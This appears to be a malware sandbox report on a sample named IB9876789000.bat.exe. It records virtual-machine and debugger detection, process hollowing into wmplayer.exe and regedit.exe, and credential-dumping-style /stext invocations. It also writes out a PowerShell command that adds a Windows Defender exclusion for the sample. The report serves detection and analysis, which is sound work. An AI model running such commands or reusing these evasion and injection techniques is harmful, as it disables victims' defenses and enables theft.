                    Source: Yara match | File source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0040E54F Sleep,ExitProcess,6_2_0040E54F
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLLP
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAMEP
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory allocated: 2437EFC0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory allocated: 2437F750000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | File opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | File opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | File opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,6_2_004198C2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3687
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6037
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Window / User API: threadDelayed 9470
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Window / User API: foregroundWindowGot 1768
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | API coverage: 9.5 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320 | Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7212 | Thread sleep count: 221 > 30
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7212 | Thread sleep time: -110500s >= -30000s
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7216 | Thread sleep count: 53 > 30
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7216 | Thread sleep time: -159000s >= -30000s
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7216 | Thread sleep count: 9470 > 30
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7216 | Thread sleep time: -28410000s >= -30000s
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0040B335
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0041B42F
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0040B53A
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0044D5E9 FindFirstFileExA,6_2_0044D5E9
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_004089A9
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00406AC2 FindFirstFileW,FindNextFileW,6_2_00406AC2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00407A8C
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_00418C69
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_00408DA7
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_100010F1
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_10006580 FindFirstFileExA,6_2_10006580
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_00406F06
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: QEMUP
                    Source: Amcache.hve.10.dr | Binary or memory string: VMware
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: Amcache.hve.10.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: wmplayer.exe, 00000006.00000003.2186344104.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181930189.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568703484.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: Amcache.hve.10.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.10.dr | Binary or memory string: vmci.sys
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE8C
                    Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
                    Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.10.dr | Binary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.10.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.10.dr | Binary or memory string: VMware PCI VMCI Bus Device
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: Amcache.hve.10.dr | Binary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.10.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWAREP
                    Source: Amcache.hve.10.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: wmplayer.exe, 00000006.00000003.2186344104.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181930189.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568703484.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
                    Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual USB Mouse
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareP
                    Source: Amcache.hve.10.dr | Binary or memory string: vmci.syshbin
                    Source: Amcache.hve.10.dr | Binary or memory string: VMware, Inc.
                    Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1hbin@
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
                    Source: Amcache.hve.10.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.10.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.10.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
                    Source: Amcache.hve.10.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.10.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIP
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
                    Source: Amcache.hve.10.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.10.dr | Binary or memory string: vmci.syshbin`
                    Source: Amcache.hve.10.dr | Binary or memory string: \driver\vmci,\driver\pci
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: Amcache.hve.10.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.10.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: IB9876789000.bat.exe, 00000000.00000002.2244070577.0000024319463000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
                    Source: bhvCBB7.tmp.13.dr | Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | API call chain: ExitProcess graph end node | graph_6-54220
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | API call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Process queried: DebugPort
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0043A65D
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041BCE3
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00442554 mov eax, dword ptr fs:[00000030h] 6_2_00442554
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_10004AB4 mov eax, dword ptr fs:[00000030h] 6_2_10004AB4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,6_2_00410B19
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Process token adjusted: Debug
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00434168
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0043A65D
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00433B44
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00433CD7 SetUnhandledExceptionFilter,6_2_00433CD7
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_100060E2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_10002639
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_10002B1C
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: IB9876789000.bat.exe, --------------.cs | Reference to suspicious API methods: GetProcAddress(_05AD_0596_05CD_05C5_05F5_059A_05A0_05C0_05B0_0591_05B0_05C3_05C8, _059E_059A_05CD_05F3_05AB_05A0_05B7_05CF_05B7_0596_05B6_05C4_05EE_05BA_059B)
                    Source: IB9876789000.bat.exe, --------------.cs | Reference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)_05FD_05AB_05AD_05B0_05B0_05B8_0590_05F9_0599_05FC_05B2_05AC_05CA_05C1_05A0_05A2_05C1_059A.Length, 64u, out var _05A3_05B7_05A1_05B4_05A5_05F5_05AE_0598_059B_05CF_05C8_05C6_05A4_059D_05A8_05BE_05FE_05AD)
                    Source: IB9876789000.bat.exe, --------------.cs | Reference to suspicious API methods: LoadLibrary(array5[0])
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,6_2_00417245
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Windows\regedit.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5A
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: NULL target: C:\Program Files (x86)\Windows Media Player\wmplayer.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Windows\regedit.exe base: 400000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Windows\regedit.exe base: 401000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Windows\regedit.exe base: 457000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Windows\regedit.exe base: 470000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Windows\regedit.exe base: 476000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Windows\regedit.exe base: 47B000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 457000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 470000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 476000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 47B000
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 9F5008
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 6_2_00410F36
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00418754 mouse_event,6_2_00418754
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\luyrhxabazosxcocxvflpvzau"
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\wwdciplcohgxhqkohgsnsamrdphe"
                    Source: wmplayer.exe, 00000006.00000002.4568703484.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerDH\*|
                    Source: wmplayer.exe, 00000006.00000002.4568652617.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181930189.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                    Source: wmplayer.exe, 00000006.00000003.2186344104.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerDH\M
                    Source: wmplayer.exe, 00000006.00000002.4568703484.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerDH\
                    Source: wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager&3
                    Source: wmplayer.exe, 00000006.00000002.4568652617.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerv
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerckets=,W
                    Source: wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186344104.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, logs.dat.6.dr | Binary or memory string: [Program Manager]
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00433E0A cpuid 6_2_00433E0A
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: GetLocaleInfoA,6_2_0040E679
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: EnumSystemLocalesW,6_2_004470AE
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: GetLocaleInfoW,6_2_004510BA
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_004511E3
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: GetLocaleInfoW,6_2_004512EA
